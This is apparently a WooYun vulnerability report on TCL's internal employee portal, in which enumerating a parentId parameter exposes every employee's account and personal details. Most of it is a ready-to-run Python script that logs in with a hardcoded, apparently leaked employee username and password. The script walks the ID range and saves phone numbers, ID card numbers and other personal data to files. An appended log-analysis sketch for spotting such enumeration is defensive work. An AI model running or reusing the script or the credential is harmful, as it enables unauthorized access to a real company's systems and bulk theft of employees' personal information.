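2015-05-19: Details have been sent to the vendor; awaiting the vendor's response
2015-05-24: The vendor has chosen to ignore the vulnerability; details are disclosed to the public
Employees' security awareness is insufficient~
WooYun: TCL internal information leak, internal employee account leaked
Changing the value of parentId makes it possible to enumerate the AdAccount of every employee.
Detailed employee information can then be queried through http://epwf.tclcom.com/ashx/GetRequestorJosnHandler.ashx.
This returns phone number, school graduated from, education level, position, department, ID card number (IDNo) and so on, blabla... a whole pile of things.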
```python
#!/usr/bin/env python
# coding: utf-8
# Python 2 script
# pip install requests requests_ntlm
import re, sys, os, time
import requests
from requests_ntlm import HttpNtlmAuth

reload(sys)
sys.setdefaultencoding('utf-8')

# Matches the AdAccount field in the JSON returned by the tree handler
AD_REGX = re.compile(r'AdAccount":"([^"]+?)"')


def get_account(start_num, end_num):
    # Walk parentId over a numeric range and save every response that contains an AdAccount
    result_file = 'tcl_account.txt'
    try:
        with open(result_file, 'a') as f:
            for id in xrange(start_num, end_num):
                url = "http://epwf.tclcom.com/ashx/OUTreeViewHandler.ashx?parentId=%s" % str(id).zfill(8)
                print url
                json = get(url)
                result = AD_REGX.search(json)
                if result:
                    f.write('%s\n' % json)
    except Exception, e:
        result_file = None
        print e.message
    return result_file


def get_info(file_account):
    # For each saved AdAccount, query the employee detail handler
    if os.path.isfile(file_account):
        with open(file_account, 'r') as f:
            with open('tcl_info.txt', 'a') as info_f:
                for line in f.readlines():
                    account_list = AD_REGX.findall(line)
                    for user in account_list:
                        url = 'http://epwf.tclcom.com/ashx/GetRequestorJosnHandler.ashx'
                        data = {'accountId': user.replace('\\\\', '\\'), 'ApproverType': '0'}
                        print user
                        info = get(url, method='POST', data=data)
                        if info:
                            info_f.write('%s\n' % info)


def get(url, method='GET', data=None):
    # NTLM-authenticated request using the leaked employee account
    url = "%s" % url
    result = ''
    pagecount = 1
    auth_nt = HttpNtlmAuth('TCT-HQ\\mingxiao.li', 'mobile#3')
    if method == 'POST':
        req = requests.post(url=url, auth=auth_nt, data=data)
    else:
        req = requests.get(url=url, auth=auth_nt)
    if req.status_code == 200:
        result = req.text
    return result


if __name__ == '__main__':
    result_account = get_account(100, 200)  # this can be changed to 100, 888888 to get more information
    if result_account:
        get_info(result_account)
```
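A detection-side sketch for the behaviour described above, added here and not part of the original report: it scans web-server logs for one authenticated client requesting many distinct parentId values on OUTreeViewHandler.ashx within a short window. The log layout, client names and thresholds are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in an assumed W3C-style layout:
# date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2015-05-19 09:00:00 10.0.0.5 CORP\\alice GET /ashx/OUTreeViewHandler.ashx parentId=00000100 200
2015-05-19 09:20:00 10.0.0.5 CORP\\alice GET /ashx/OUTreeViewHandler.ashx parentId=00000117 200
2015-05-19 10:00:01 10.0.0.9 CORP\\bob GET /ashx/OUTreeViewHandler.ashx parentId=00000100 200
2015-05-19 10:00:02 10.0.0.9 CORP\\bob GET /ashx/OUTreeViewHandler.ashx parentId=00000101 200
2015-05-19 10:00:03 10.0.0.9 CORP\\bob GET /ashx/OUTreeViewHandler.ashx parentId=00000102 200
2015-05-19 10:00:04 10.0.0.9 CORP\\bob GET /ashx/OUTreeViewHandler.ashx parentId=00000103 200
2015-05-19 10:00:05 10.0.0.9 CORP\\bob GET /ashx/OUTreeViewHandler.ashx parentId=00000104 200
2015-05-19 10:00:06 10.0.0.9 CORP\\bob GET /ashx/OUTreeViewHandler.ashx parentId=00000105 200
2015-05-19 10:00:07 10.0.0.9 CORP\\bob GET /default.aspx - 200
"""

ENDPOINT = "/ashx/outreeviewhandler.ashx"
PARENT_ID = re.compile(r"(?:^|&)parentId=(\d+)(?:&|$)", re.I)

def parse(lines):
    """Yield (client, timestamp, parentId) for requests to the tree handler."""
    for line in lines:
        parts = line.split()
        if len(parts) != 8 or parts[5].lower() != ENDPOINT:
            continue
        m = PARENT_ID.search(parts[6])
        if m:
            ts = datetime.strptime(parts[0] + " " + parts[1], "%Y-%m-%d %H:%M:%S")
            yield (parts[2], parts[3]), ts, int(m.group(1))

def find_enumerators(lines, min_distinct=5, window=timedelta(seconds=60)):
    """Return {client: max distinct parentId values seen inside any window}."""
    per_client = defaultdict(list)
    for client, ts, pid in parse(lines):
        per_client[client].append((ts, pid))
    flagged = {}
    for client, events in per_client.items():
        events.sort()
        best, start = 0, 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # drop events that fell out of the sliding window
            best = max(best, len({pid for _, pid in events[start:end + 1]}))
        if best >= min_distinct:
            flagged[client] = best
    return flagged
```

Counting distinct values rather than looking for strictly sequential ones also catches a client that walks the same ID range in shuffled order.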
Raise employees' security awareness
Severity: no impact (ignored by vendor)
Ignored at: 2015-05-24 14:10
Vulnerability Rank: 15 (WooYun rating)
None yet